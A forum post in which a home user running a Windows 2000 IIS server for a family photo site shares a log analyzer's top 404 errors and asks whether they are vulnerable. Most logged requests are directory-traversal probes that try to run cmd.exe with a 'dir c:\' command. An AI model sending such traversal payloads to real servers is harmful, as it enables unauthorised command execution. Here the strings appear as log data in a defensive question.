Hey all,
Finally grabbed a log analyzer program and looking through the log files for a simple win2k server with IIS that I run a personal family pictures site on.
The log analyzer lists these as the top 10 things that give 404 errors...
Code:
Page Not Found Errors(404 Error)
NO. Request Referrer Count
1 /winnt/system32/cmd.exe?/c+dir?/c+dir+c:\ No referrer 116
2 /winnt/system32/cmd.exe?/c+dir+c:\ No referrer 97
3 /winnt/system32/cmd.exe?/c?/c+dir+c:\ No referrer 15
4 /robots.txt No referrer 14
5 /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/syst em32/cmd.exe?/c+dir+c:\ No referrer 12
6 /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe? /c?/c+dir+c:\ No referrer 8
7 /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+di r+c:\ No referrer 8
8 /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe? /c+dir+c:\ No referrer 8
9 /a.asp?/c+dir+c:\|-|0|404_Object_Not_Found No referrer 8
10 /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c?/c +dir+c:\ No referrer 8
I realize that most or all are attempts by people to break into the machine.(probably automated attempts)
Just wondering if anyone could explain them better, and if they got 404 errors does that mean I'm fine.
I update IIS and win2k on it very regularly.
Just wondering if I'm vulnerable to this stuff, or what.
thx
dragonb
p.s. no IIS bashing, for professional stuff I usually use apache on either linux or windows and php.
Linear Mode
